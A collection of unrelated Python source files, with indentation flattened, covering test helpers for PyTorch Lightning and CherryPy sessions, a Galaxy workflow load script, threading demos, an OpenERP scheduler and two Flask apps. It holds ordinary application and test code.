conda_base_path,
basedir,
)
except (KeyboardInterrupt, SystemExit) as e:
# Re-raise the keyboard interrupt in order to record an error in the
# scheduler but ignore it
raise e
except (Exception, BaseException) as ex:
log_verbose_traceback(ex)
# this ensures that exception can be re-raised in the parent thread
lineno, file = get_exception_origin(ex, linemaps)
raise RuleException(
format_error(
ex, lineno, linemaps=linemaps, snakefile=file, show_traceback=True
)
)
if benchmark is not None:
try:
write_benchmark_records(bench_records, benchmark)
except (Exception, BaseException) as ex:
raise WorkflowError(ex)
|
utils.py
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import os
import traceback
from contextlib import contextmanager
from typing import Optional
import pytest
from pytorch_lightning import seed_everything
from pytorch_lightning.callbacks import ModelCheckpoint
from pytorch_lightning.loggers import TensorBoardLogger
from tests import _TEMP_PATH, RANDOM_PORTS
from tests.helpers.boring_model import BoringModel
def get_default_logger(save_dir, version=None):
# set up logger object without actually saving logs
logger = TensorBoardLogger(save_dir, name="lightning_logs", version=version)
return logger
def get_data_path(expt_logger, path_dir=None):
    # some calls pass only the experiment, not the complete logger
# each logger has to have these attributes
name, version = expt_logger.name, expt_logger.version
# the other experiments...
if not path_dir:
if hasattr(expt_logger, "save_dir") and expt_logger.save_dir:
path_dir = expt_logger.save_dir
else:
path_dir = _TEMP_PATH
path_expt = os.path.join(path_dir, name, "version_%s" % version)
    # check whether the new sub-folder exists, typical case for test-tube
if not os.path.isdir(path_expt):
path_expt = path_dir
return path_expt
def load_model_from_checkpoint(logger, root_weights_dir, module_class=BoringModel):
trained_model = module_class.load_from_checkpoint(root_weights_dir)
assert trained_model is not None, "loading model failed"
return trained_model
def assert_ok_model_acc(trainer, key="test_acc", thr=0.5):
# this model should get 0.80+ acc
acc = trainer.callback_metrics[key]
assert acc > thr, f"Model failed to get expected {thr} accuracy. {key} = {acc}"
def reset_seed(seed=0):
seed_everything(seed)
def set_random_main_port():
reset_seed()
port = RANDOM_PORTS.pop()
os.environ["MASTER_PORT"] = str(port)
def init_checkpoint_callback(logger):
checkpoint = ModelCheckpoint(dirpath=logger.save_dir)
return checkpoint
def pl_multi_process_test(func):
"""Wrapper for running multi-processing tests."""
@functools.wraps(func)
def wrapper(*args, **kwargs):
from multiprocessing import Process, Queue
queue = Queue()
def inner_f(queue, **kwargs):
try:
func(**kwargs)
queue.put(1)
except Exception:
_trace = traceback.format_exc()
print(_trace)
# code 17 means RuntimeError: tensorflow/compiler/xla/xla_client/mesh_service.cc:364 :
# Failed to meet rendezvous 'torch_xla.core.xla_model.save': Socket closed (14)
if "terminated with exit code 17" in _trace:
queue.put(1)
else:
queue.put(-1)
proc = Process(target=inner_f, args=(queue,), kwargs=kwargs)
proc.start()
proc.join()
result = queue.get()
assert result == 1, "expected 1, but returned %s" % result
return wrapper
@contextmanager
def no_warning_call(warning_type, match: Optional[str] = None):
with pytest.warns(None) as record:
yield
try:
w = record.pop(warning_type)
if not (match and match in str(w.message)):
return
except AssertionError:
# no warning raised
return
raise AssertionError(f"`{warning_type}` was raised: {w}")
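# Illustrative usage: assert that a block does not emit a given warning, e.g.
#
#     with no_warning_call(UserWarning, match="deprecated"):
#         call_under_test()  # hypothetical callable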
|
workflows_scaling.py
|
import functools
import json
import os
import random
import sys
from threading import Thread
from uuid import uuid4
galaxy_root = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, os.path.pardir))
sys.path[1:1] = [ os.path.join( galaxy_root, "lib" ), os.path.join( galaxy_root, "test" ) ]
try:
from argparse import ArgumentParser
except ImportError:
ArgumentParser = None
try:
from galaxy import eggs
eggs.require("requests")
eggs.require("bioblend")
except ImportError:
pass
import requests
from bioblend import galaxy
from api import helpers, yaml_to_workflow
LONG_TIMEOUT = 1000000000
DESCRIPTION = "Script to exercise the workflow engine."
def main(argv=None):
if ArgumentParser is None:
raise Exception("Test requires Python 2.7")
arg_parser = ArgumentParser(description=DESCRIPTION)
arg_parser.add_argument("--api_key", default="testmasterapikey")
arg_parser.add_argument("--host", default="http://localhost:8080/")
arg_parser.add_argument("--collection_size", type=int, default=20)
arg_parser.add_argument("--workflow_depth", type=int, default=10)
arg_parser.add_argument("--two_outputs", default=False, action="store_true")
arg_parser.add_argument("--workflow_count", type=int, default=1)
args = arg_parser.parse_args(argv)
uuid = str(uuid4())
workflow_struct = _workflow_struct(args, uuid)
gi = _gi(args)
workflow = yaml_to_workflow.python_to_workflow(workflow_struct)
workflow_info = gi.workflows.import_workflow_json(workflow)
workflow_id = workflow_info["id"]
target = functools.partial(_run, args, gi, workflow_id, uuid)
threads = []
for i in range(args.workflow_count):
t = Thread(target=target)
t.daemon = True
t.start()
threads.append(t)
for t in threads:
t.join()
def _run(args, gi, workflow_id, uuid):
dataset_populator = GiDatasetPopulator(gi)
dataset_collection_populator = GiDatasetCollectionPopulator(gi)
history_id = dataset_populator.new_history()
contents = []
for i in range(args.collection_size):
contents.append("random dataset number #%d" % i)
hdca = dataset_collection_populator.create_list_in_history( history_id, contents=contents ).json()
label_map = {
uuid: {"src": "hdca", "id": hdca["id"]},
}
workflow_request = dict(
history="hist_id=%s" % history_id,
)
workflow_request[ "inputs" ] = json.dumps( label_map )
url = "workflows/%s/usage" % ( workflow_id )
invoke_response = dataset_populator._post( url, data=workflow_request ).json()
invocation_id = invoke_response["id"]
workflow_populator = GiWorkflowPopulator(gi)
workflow_populator.wait_for_workflow( workflow_id, invocation_id, history_id, timeout=LONG_TIMEOUT )
class GiPostGetMixin:
def _get(self, route):
return self._gi.make_get_request(self.__url(route))
def _post(self, route, data={}):
data = data.copy()
data['key'] = self._gi.key
return requests.post(self.__url(route), data=data)
def __url(self, route):
return self._gi.url + "/" + route
class GiDatasetPopulator(helpers.BaseDatasetPopulator, GiPostGetMixin):
def __init__(self, gi):
self._gi = gi
class GiDatasetCollectionPopulator(helpers.BaseDatasetCollectionPopulator, GiPostGetMixin):
def __init__(self, gi):
self._gi = gi
self.dataset_populator = GiDatasetPopulator(gi)
def _create_collection(self, payload):
create_response = self._post( "dataset_collections", data=payload )
return create_response
class GiWorkflowPopulator(helpers.BaseWorkflowPopulator, GiPostGetMixin):
def __init__(self, gi):
self._gi = gi
self.dataset_populator = GiDatasetPopulator(gi)
def _workflow_struct(args, input_uuid):
if args.two_outputs:
return _workflow_struct_two_outputs(args, input_uuid)
else:
return _workflow_struct_simple(args, input_uuid)
def _workflow_struct_simple(args, input_uuid):
workflow_struct = [
{"type": "input_collection", "uuid": input_uuid},
{"tool_id": "cat1", "state": {"input1": _link(0)}}
]
workflow_depth = args.workflow_depth
for i in range(workflow_depth):
link = str(i + 1) + "#out_file1"
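        # "<step>#<output>" wires this step's input to a previous step's output,
        # e.g. "3#out_file1" consumes output "out_file1" of workflow step 3.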
workflow_struct.append(
{"tool_id": "cat1", "state": {"input1": _link(link)}}
)
return workflow_struct
def _workflow_struct_two_outputs(args, input_uuid):
workflow_struct = [
{"type": "input_collection", "uuid": input_uuid},
{"tool_id": "cat1", "state": {"input1": _link(0), "input2": _link(0)}}
]
workflow_depth = args.workflow_depth
for i in range(workflow_depth):
link1 = str(i + 1) + "#out_file1"
link2 = str(i + 1) + "#out_file2"
workflow_struct.append(
{"tool_id": "cat1", "state": {"input1": _link(link1), "input2": _link(link2)}}
)
return workflow_struct
def _link(link):
return {"$link": link}
def _gi(args):
gi = galaxy.GalaxyInstance(args.host, key=args.api_key)
name = "wftest-user-%d" % random.randint(0, 1000000)
user = gi.users.create_local_user(name, "%s@galaxytesting.dev" % name, "pass123")
user_id = user["id"]
api_key = gi.users.create_user_apikey(user_id)
user_gi = galaxy.GalaxyInstance(args.host, api_key)
return user_gi
if __name__ == "__main__":
main()
|
thread_test1.py
|
import threading
import time
# https://www.maxlist.xyz/2020/03/15/python-threading/
def main(url, num):
    print('Start executing', url)
    time.sleep(2)
    print('Finished', num)
url_list1 = ['11111, 1-1-1-1-1']
url_list2 = ['22222, 2-2-2-2-2']
url_list3 = ['33333, 3-3-3-3-3']
# Define the threads
t_list = []
t1 = threading.Thread(target=main, args=(url_list1, 1))
t_list.append(t1)
t2 = threading.Thread(target=main, args=(url_list2, 2))
t_list.append(t2)
t3 = threading.Thread(target=main, args=(url_list3, 3))
t_list.append(t3)
# Start the work
for t in t_list:
t.start()
# Wait for all threads to finish
for t in t_list:
t.join()
|
test_session.py
|
import os
localDir = os.path.dirname(__file__)
import threading
import time
import cherrypy
from cherrypy._cpcompat import copykeys, HTTPConnection, HTTPSConnection
from cherrypy.lib import sessions
from cherrypy.lib import reprconf
from cherrypy.lib.httputil import response_codes
def http_methods_allowed(methods=['GET', 'HEAD']):
method = cherrypy.request.method.upper()
if method not in methods:
cherrypy.response.headers['Allow'] = ", ".join(methods)
raise cherrypy.HTTPError(405)
cherrypy.tools.allow = cherrypy.Tool('on_start_resource', http_methods_allowed)
def setup_server():
@cherrypy.config(**{
'tools.sessions.on': True,
'tools.sessions.storage_class': sessions.RamSession,
'tools.sessions.storage_path': localDir,
'tools.sessions.timeout': (1.0 / 60),
'tools.sessions.clean_freq': (1.0 / 60),
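        # timeout and clean_freq are given in minutes, so 1.0 / 60 is one second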
})
class Root:
@cherrypy.expose
def clear(self):
cherrypy.session.cache.clear()
@cherrypy.expose
def data(self):
cherrypy.session['aha'] = 'foo'
return repr(cherrypy.session._data)
@cherrypy.expose
def testGen(self):
counter = cherrypy.session.get('counter', 0) + 1
cherrypy.session['counter'] = counter
yield str(counter)
@cherrypy.expose
def testStr(self):
counter = cherrypy.session.get('counter', 0) + 1
cherrypy.session['counter'] = counter
return str(counter)
@cherrypy.expose
@cherrypy.config(**{'tools.sessions.on': False})
def set_session_cls(self, new_cls_name):
new_cls = reprconf.attributes(new_cls_name)
cfg = {'tools.sessions.storage_class': new_cls}
self.__class__._cp_config.update(cfg)
if hasattr(cherrypy, "session"):
del cherrypy.session
if new_cls.clean_thread:
new_cls.clean_thread.stop()
new_cls.clean_thread.unsubscribe()
del new_cls.clean_thread
@cherrypy.expose
def index(self):
sess = cherrypy.session
c = sess.get('counter', 0) + 1
time.sleep(0.01)
sess['counter'] = c
return str(c)
@cherrypy.expose
def keyin(self, key):
return str(key in cherrypy.session)
@cherrypy.expose
def delete(self):
cherrypy.session.delete()
sessions.expire()
return "done"
@cherrypy.expose
def delkey(self, key):
del cherrypy.session[key]
return "OK"
@cherrypy.expose
def redir_target(self):
return self._cp_config['tools.sessions.storage_class'].__name__
@cherrypy.expose
def iredir(self):
raise cherrypy.InternalRedirect('/redir_target')
@cherrypy.expose
@cherrypy.config(**{
'tools.allow.on': True,
'tools.allow.methods': ['GET'],
})
def restricted(self):
return cherrypy.request.method
@cherrypy.expose
def regen(self):
cherrypy.tools.sessions.regenerate()
return "logged in"
@cherrypy.expose
def length(self):
return str(len(cherrypy.session))
@cherrypy.expose
@cherrypy.config(**{
'tools.sessions.path': '/session_cookie',
'tools.sessions.name': 'temp',
'tools.sessions.persistent': False,
})
def session_cookie(self):
# Must load() to start the clean thread.
cherrypy.session.load()
return cherrypy.session.id
cherrypy.tree.mount(Root())
from cherrypy.test import helper
class SessionTest(helper.CPWebCase):
setup_server = staticmethod(setup_server)
def tearDown(self):
# Clean up sessions.
for fname in os.listdir(localDir):
if fname.startswith(sessions.FileSession.SESSION_PREFIX):
os.unlink(os.path.join(localDir, fname))
def test_0_Session(self):
self.getPage('/set_session_cls/cherrypy.lib.sessions.RamSession')
self.getPage('/clear')
# Test that a normal request gets the same id in the cookies.
# Note: this wouldn't work if /data didn't load the session.
self.getPage('/data')
self.assertBody("{'aha': 'foo'}")
c = self.cookies[0]
self.getPage('/data', self.cookies)
self.assertEqual(self.cookies[0], c)
self.getPage('/testStr')
self.assertBody('1')
cookie_parts = dict([p.strip().split('=')
for p in self.cookies[0][1].split(";")])
# Assert there is an 'expires' param
self.assertEqual(set(cookie_parts.keys()),
set(['session_id', 'expires', 'Path']))
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/data', self.cookies)
self.assertBody("{'aha': 'foo', 'counter': 3}")
self.getPage('/length', self.cookies)
self.assertBody('2')
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
self.getPage('/set_session_cls/cherrypy.lib.sessions.FileSession')
self.getPage('/testStr')
self.assertBody('1')
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
# Wait for the session.timeout (1 second)
time.sleep(2)
self.getPage('/')
self.assertBody('1')
self.getPage('/length', self.cookies)
self.assertBody('1')
# Test session __contains__
self.getPage('/keyin?key=counter', self.cookies)
self.assertBody("True")
cookieset1 = self.cookies
# Make a new session and test __len__ again
self.getPage('/')
self.getPage('/length', self.cookies)
self.assertBody('2')
# Test session delete
self.getPage('/delete', self.cookies)
self.assertBody("done")
self.getPage('/delete', cookieset1)
self.assertBody("done")
f = lambda: [
x for x in os.listdir(localDir) if x.startswith('session-')]
self.assertEqual(f(), [])
# Wait for the cleanup thread to delete remaining session files
self.getPage('/')
f = lambda: [
x for x in os.listdir(localDir) if x.startswith('session-')]
self.assertNotEqual(f(), [])
time.sleep(2)
self.assertEqual(f(), [])
def test_1_Ram_Concurrency(self):
self.getPage('/set_session_cls/cherrypy.lib.sessions.RamSession')
self._test_Concurrency()
def test_2_File_Concurrency(self):
self.getPage('/set_session_cls/cherrypy.lib.sessions.FileSession')
self._test_Concurrency()
def _test_Concurrency(self):
client_thread_count = 5
request_count = 30
# Get initial cookie
self.getPage("/")
self.assertBody("1")
cookies = self.cookies
data_dict = {}
errors = []
def request(index):
if self.scheme == 'https':
c = HTTPSConnection('%s:%s' % (self.interface(), self.PORT))
else:
c = HTTPConnection('%s:%s' % (self.interface(), self.PORT))
for i in range(request_count):
c.putrequest('GET', '/')
for k, v in cookies:
c.putheader(k, v)
c.endheaders()
response = c.getresponse()
body = response.read()
if response.status != 200 or not body.isdigit():
errors.append((response.status, body))
else:
data_dict[index] = max(data_dict[index], int(body))
# Uncomment the following line to prove threads overlap.
## sys.stdout.write("%d " % index)
# Start <request_count> requests from each of
# <client_thread_count> concurrent clients
ts = []
for c in range(client_thread_count):
data_dict[c] = 0
t = threading.Thread(target=request, args=(c,))
ts.append(t)
t.start()
for t in ts:
t.join()
hitcount = max(data_dict.values())
expected = 1 + (client_thread_count * request_count)
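        # i.e. the initial priming request plus 5 clients * 30 requests = 151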
for e in errors:
print(e)
self.assertEqual(hitcount, expected)
def test_3_Redirect(self):
# Start a new session
self.getPage('/testStr')
self.getPage('/iredir', self.cookies)
self.assertBody("FileSession")
def test_4_File_deletion(self):
# Start a new session
self.getPage('/testStr')
# Delete the session file manually and retry.
id = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
path = os.path.join(localDir, "session-" + id)
os.unlink(path)
self.getPage('/testStr', self.cookies)
def test_5_Error_paths(self):
self.getPage('/unknown/page')
self.assertErrorPage(404, "The path '/unknown/page' was not found.")
# Note: this path is *not* the same as above. The above
# takes a normal route through the session code; this one
# skips the session code's before_handler and only calls
# before_finalize (save) and on_end (close). So the session
# code has to survive calling save/close without init.
self.getPage('/restricted', self.cookies, method='POST')
self.assertErrorPage(405, response_codes[405][1])
def test_6_regenerate(self):
self.getPage('/testStr')
# grab the cookie ID
id1 = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
self.getPage('/regen')
self.assertBody('logged in')
id2 = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
self.assertNotEqual(id1, id2)
self.getPage('/testStr')
# grab the cookie ID
id1 = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
self.getPage('/testStr',
headers=[
('Cookie',
'session_id=maliciousid; '
'expires=Sat, 27 Oct 2017 04:18:28 GMT; Path=/;')])
id2 = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
self.assertNotEqual(id1, id2)
self.assertNotEqual(id2, 'maliciousid')
def test_7_session_cookies(self):
self.getPage('/set_session_cls/cherrypy.lib.sessions.RamSession')
self.getPage('/clear')
self.getPage('/session_cookie')
# grab the cookie ID
cookie_parts = dict([p.strip().split('=')
for p in self.cookies[0][1].split(";")])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
id1 = cookie_parts['temp']
self.assertEqual(copykeys(sessions.RamSession.cache), [id1])
# Send another request in the same "browser session".
self.getPage('/session_cookie', self.cookies)
cookie_parts = dict([p.strip().split('=')
for p in self.cookies[0][1].split(";")])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
self.assertBody(id1)
self.assertEqual(copykeys(sessions.RamSession.cache), [id1])
# Simulate a browser close by just not sending the cookies
self.getPage('/session_cookie')
# grab the cookie ID
cookie_parts = dict([p.strip().split('=')
for p in self.cookies[0][1].split(";")])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
# Assert a new id has been generated...
id2 = cookie_parts['temp']
self.assertNotEqual(id1, id2)
self.assertEqual(set(sessions.RamSession.cache.keys()),
set([id1, id2]))
# Wait for the session.timeout on both sessions
time.sleep(2.5)
cache = copykeys(sessions.RamSession.cache)
if cache:
if cache == [id2]:
self.fail("The second session did not time out.")
else:
self.fail("Unknown session id in cache: %r", cache)
def test_8_Ram_Cleanup(self):
def lock():
s1 = sessions.RamSession()
s1.acquire_lock()
time.sleep(1)
s1.release_lock()
t = threading.Thread(target=lock)
t.start()
s2 = sessions.RamSession()
s2.clean_up()
self.assertEqual(len(sessions.RamSession.locks), 1, 'Clean up should not remove active lock')
t.join()
import socket
try:
import memcache # NOQA
host, port = '127.0.0.1', 11211
for res in socket.getaddrinfo(host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
s = None
try:
s = socket.socket(af, socktype, proto)
# See http://groups.google.com/group/cherrypy-users/
# browse_frm/thread/bbfe5eb39c904fe0
s.settimeout(1.0)
s.connect((host, port))
s.close()
except socket.error:
if s:
s.close()
raise
break
except (ImportError, socket.error):
class MemcachedSessionTest(helper.CPWebCase):
setup_server = staticmethod(setup_server)
def test(self):
return self.skip("memcached not reachable ")
else:
class MemcachedSessionTest(helper.CPWebCase):
setup_server = staticmethod(setup_server)
def test_0_Session(self):
            self.getPage('/set_session_cls/cherrypy.lib.sessions.MemcachedSession')
self.getPage('/testStr')
self.assertBody('1')
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/length', self.cookies)
self.assertErrorPage(500)
self.assertInBody("NotImplementedError")
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
# Wait for the session.timeout (1 second)
time.sleep(1.25)
self.getPage('/')
self.assertBody('1')
# Test session __contains__
self.getPage('/keyin?key=counter', self.cookies)
self.assertBody("True")
# Test session delete
self.getPage('/delete', self.cookies)
self.assertBody("done")
def test_1_Concurrency(self):
client_thread_count = 5
request_count = 30
# Get initial cookie
self.getPage("/")
self.assertBody("1")
cookies = self.cookies
data_dict = {}
def request(index):
for i in range(request_count):
self.getPage("/", cookies)
# Uncomment the following line to prove threads overlap.
## sys.stdout.write("%d " % index)
if not self.body.isdigit():
self.fail(self.body)
data_dict[index] = int(self.body)
# Start <request_count> concurrent requests from
# each of <client_thread_count> clients
ts = []
for c in range(client_thread_count):
data_dict[c] = 0
t = threading.Thread(target=request, args=(c,))
ts.append(t)
t.start()
for t in ts:
t.join()
hitcount = max(data_dict.values())
expected = 1 + (client_thread_count * request_count)
self.assertEqual(hitcount, expected)
def test_3_Redirect(self):
# Start a new session
self.getPage('/testStr')
self.getPage('/iredir', self.cookies)
self.assertBody("memcached")
def test_5_Error_paths(self):
self.getPage('/unknown/page')
self.assertErrorPage(
404, "The path '/unknown/page' was not found.")
# Note: this path is *not* the same as above. The above
# takes a normal route through the session code; this one
# skips the session code's before_handler and only calls
# before_finalize (save) and on_end (close). So the session
# code has to survive calling save/close without init.
self.getPage('/restricted', self.cookies, method='POST')
self.assertErrorPage(405, response_codes[405][1])
|
thread9.py
|
# Python Program Where Two Threads Are Acting On The Same Method To Allot A Berth For The Passenger
'''
Function Name : Two Threads Are Acting On The Same Method
Function Date : 5 Oct 2020
Function Author : Prasad Dangare
Input : String
Output : String
'''
from threading import *
from time import *
class Railway:
# Constructor That Accepts No Of Available Berths
def __init__(self, available):
self.available = available
# A Method That Reserves Berth
def reserve(self, wanted):
# Display No. Of Available Berths
print('Available no. of berths = ', self.available)
# If Available >= Wanted , Allot The Berth
if(self.available >= wanted):
# Find The Thread Name
name = current_thread().getName()
# Display Berth Is Allocated For The Person
print('%d berths allotted for %s' %(wanted, name))
# Make Time Delay So That The Ticket Is Printed
sleep(1.5)
# Decrease The No. Of Available Berths
self.available -= wanted
else:
# If Available < Wanted Then Say Sorry
            print('Sorry, No Berths To Allot')
# Create An Instance Of The Railway Class
# Specify That Only One Berth Is Available
obj = Railway(1)
# Create Two Threads And Specify That 1 Berth Is Needed By Each
t1 = Thread(target=obj.reserve, args=(1,))
t2 = Thread(target=obj.reserve, args=(1,))
# Give Names To The Thread
t1.setName('First Person')
t2.setName('Second Person')
# Run The Thread
t1.start()
t2.start()
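# Note: reserve() checks self.available but only decrements it after sleep(1.5),
# so both threads can be allotted the single berth. A minimal sketch of a fix
# (not part of the original example) would guard the check-and-decrement with a
# lock:
#
#     lock = Lock()
#     def reserve(self, wanted):
#         with lock:
#             if self.available >= wanted:
#                 ...
#                 self.available -= wanted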
|
schedulers_all.py
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import threading
from openerp import pooler
from openerp.osv import fields, osv
class procurement_compute_all(osv.osv_memory):
_name = 'procurement.order.compute.all'
_description = 'Compute all schedulers'
_columns = {
'automatic': fields.boolean('Automatic orderpoint',help='Triggers an automatic procurement for all products that have a virtual stock under 0. You should probably not use this option, we suggest using a MTO configuration on products.'),
}
_defaults = {
'automatic': lambda *a: False,
}
def _procure_calculation_all(self, cr, uid, ids, context=None):
"""
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param ids: List of IDs selected
@param context: A standard dictionary
"""
proc_obj = self.pool.get('procurement.order')
        # As this function runs in a new thread, we need to open a new cursor, because the old one may be closed
new_cr = pooler.get_db(cr.dbname).cursor()
for proc in self.browse(new_cr, uid, ids, context=context):
proc_obj.run_scheduler(new_cr, uid, automatic=proc.automatic, use_new_cursor=new_cr.dbname,\
context=context)
#close the new cursor
new_cr.close()
return {}
def procure_calculation(self, cr, uid, ids, context=None):
"""
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param ids: List of IDs selected
@param context: A standard dictionary
"""
threaded_calculation = threading.Thread(target=self._procure_calculation_all, args=(cr, uid, ids, context))
threaded_calculation.start()
return {'type': 'ir.actions.act_window_close'}
procurement_compute_all()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
app.py
|
import json
import threading
import logging
import os
import variables
from flask import Flask, jsonify, send_from_directory, request
from flask_cors import CORS
from chomps.chomps import initialize
from chomps.sheetsdecorator import SheetsDecorator
class WebChomps(object):
def __init__(self):
self.credentials_path = os.path.join('.', 'data', 'client_secret.json')
assert os.path.exists(self.credentials_path)
self.bot_id = variables.BOT_ID
self.debug = variables.DEBUG
self.web_port = variables.WEB_PORT
self.use_spreadsheet = variables.USE_SPREADSHEET
self.service_credentials = variables.SERVICE_CREDENTIALS
self.email_address = variables.EMAIL_ADDRESS
self.listening_port = variables.LISTENING_PORT
self.app = Flask(__name__, static_folder='react/build')
self.app.url_map.strict_slashes = False
self.spreadsheet = self.init_spreadsheet()
self.chomps_instance = initialize(bot_id=self.bot_id, debug=self.debug, use_spreadsheet=self.use_spreadsheet,
service_credentials=self.service_credentials)
        # Run the blocking chomps listener on a background thread
        self.listener_thread = threading.Thread(target=self.start_server, daemon=True)
        self.listener_thread.start()
def start_server(self):
self.chomps_instance.listen(port=self.listening_port) # Blocking call
def init_spreadsheet(self):
self.app.logger.info('Preparing to initialize stats spreadsheet')
spread = None
if os.path.exists(self.credentials_path):
spread = SheetsDecorator(load_spreadsheet=False, credentials=self.credentials_path)
spread.init_spreadsheet(email=self.email_address)
self.app.logger.info('Successfully created spreadsheet!')
else:
self.app.logger.error('Credentials file not found in path {}'.format(self.credentials_path))
return spread
web_chomps = WebChomps()
cors = CORS(web_chomps.app, resources={r'/api/*': {'origins': variables.ACCEPTED_ORIGINS}}, supports_credentials=True)
@web_chomps.app.route('/', defaults={'path': ''}, methods=['GET'])
@web_chomps.app.route('/<path:path>', methods=['GET'])
def serve(path):
# Serve React App
if path != '' and os.path.exists(web_chomps.app.static_folder + path):
message = 'Serving path: {}'.format(os.path.join(web_chomps.app.static_folder, path))
web_chomps.app.logger.info(message)
print(message)
return send_from_directory(web_chomps.app.static_folder, path)
else:
message = 'Serving path: {}'.format(os.path.join(web_chomps.app.static_folder, 'index.html'))
web_chomps.app.logger.info(message)
print(message)
return send_from_directory(web_chomps.app.static_folder, 'index.html')
@web_chomps.app.route('/api/context', methods=['GET', 'POST'])
def api_context():
canonical_names = web_chomps.chomps_instance.canonical_names
season_stats = web_chomps.chomps_instance.season_stats
response = jsonify({'names': canonical_names, 'season': season_stats})
response.status_code = 200
return response
@web_chomps.app.route('/api/table', methods=['GET', 'POST'])
def api_table():
context = web_chomps.chomps_instance.get_table_data()
response = jsonify(context)
response.status_code = 200
return response
@web_chomps.app.route('/api/players', methods=['POST'])
def api_players():
context = web_chomps.chomps_instance.nickname_map # GET STATS HERE AS DICT
response = jsonify({})
response.status_code = 200
return response
@web_chomps.app.route('/api/seasons', methods=['POST'])
def api_seasons():
context = web_chomps.chomps_instance.nickname_map # GET STATS HERE AS DICT
response = jsonify({})
response.status_code = 200
return response
@web_chomps.app.route('/api/teams', methods=['GET', 'POST'])
def api_teams():
request_json = request.get_json()
player_one = request_json.get('player1')
player_two = request_json.get('player2')
team_stats = web_chomps.chomps_instance.get_team_stats(player_one, player_two)
response = jsonify(team_stats)
response.status_code = 200
return response
if __name__ == '__main__':
logging_format = '%(asctime)s %(name)s [%(filename)s:%(lineno)d][%(process)d] [%(levelname)s] %(message)s'
debug = bool(web_chomps.debug)
port = int(web_chomps.web_port)
host = '0.0.0.0'
logging.basicConfig(level=logging.DEBUG if debug else logging.INFO, format=logging_format)
web_chomps.app.logger.info('Starting server on {host}:{port}. Debug: {debug}.'.format(host=host, port=port, debug=debug))
web_chomps.app.run(host=host, port=port, debug=debug, threaded=True)
|
TFLite_detection_webcam_api.py
|
#########################################
# Sensor Fusion API #
# (C) 2020 - De-Risking Strategies, LLC #
# DRS ML/AI Flask API #
# Authors: Pushkar K / Drew A #
# Updated 12-27-2020 #
#########################################
import os
import argparse
import config
import cv2 as cv2
import numpy as np
import sys
import time
from threading import Thread
import importlib.util
#Flask
import json
from flask import Flask, jsonify, request, render_template, Response, session, stream_with_context
from importlib import reload
import gc
import webbrowser
import pickle
from sfui import widgets #custom package
app = Flask(__name__)
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0 #Disable Flask Cache as it interferes with streaming
capture_image_limit = 2000
#Model Switcher
with open('/home/pi/SensorFusion/model.obj', 'rb') as model_file:
    run_model = pickle.load(model_file)
os.environ['run_model'] = run_model
print("run_model " + run_model)
#Client Commands
os.environ['labels_flag'] = 'labels_on'
#print('Init: ', os.environ.get('labels_flag'))
os.environ['scores_flag'] = 'scores_on'
#Capture
os.environ['cap_flag'] = 'False'
#kill_TF
os.environ['kill_tensorFlow'] = 'False'
#local var
fps_flag = False #showing frames per second is false by default - controlled by 'F' keyboard command
@app.route('/',methods=['GET'])
def index():
video_camera_flag = True
#On a reload
quit_flag = os.environ.get('quit_flag')
    if quit_flag == 'quit':
cv2.destroyAllWindows()
try:
if videostream:
#videostream.release()
videostream.stop()
except:
pass
return render_template('index.html' )
@app.route('/refresh_data')
def refresh_data():
#sfCallBack method that sends data to the javascript poller in data.js
sfCommand = request.args.get('command')
print("sfCallBack: ", sfCommand)
if sfCommand == "s": #save file
        os.environ['fileIndex_flag'] = '0'  # environment values must be strings
print('Setting FileIndex_Flag')
#Get the File index from the save command
file_save_id = 1
return str(file_save_id)
@app.route('/api', methods = ['GET','POST'])
def api():
# POST request - Sensor Fusion Commands
if request.method == 'POST':
print('Incoming command from Sensor Fusion client ...')
sfCommand = request.get_json()
print(sfCommand) # parse as JSON
first_char = sfCommand[0]
if first_char == 'a':
chunks = sfCommand.split(',')
sfCommand = 'annotate'
#Get the annotation data - name, image count, description
os.environ['annotate_name'] = str(chunks[1])
os.environ['annotate_images'] = str(chunks[2])
global anno_images
anno_images = str(chunks[2])
#kill TensorFlow
if first_char == 'k':
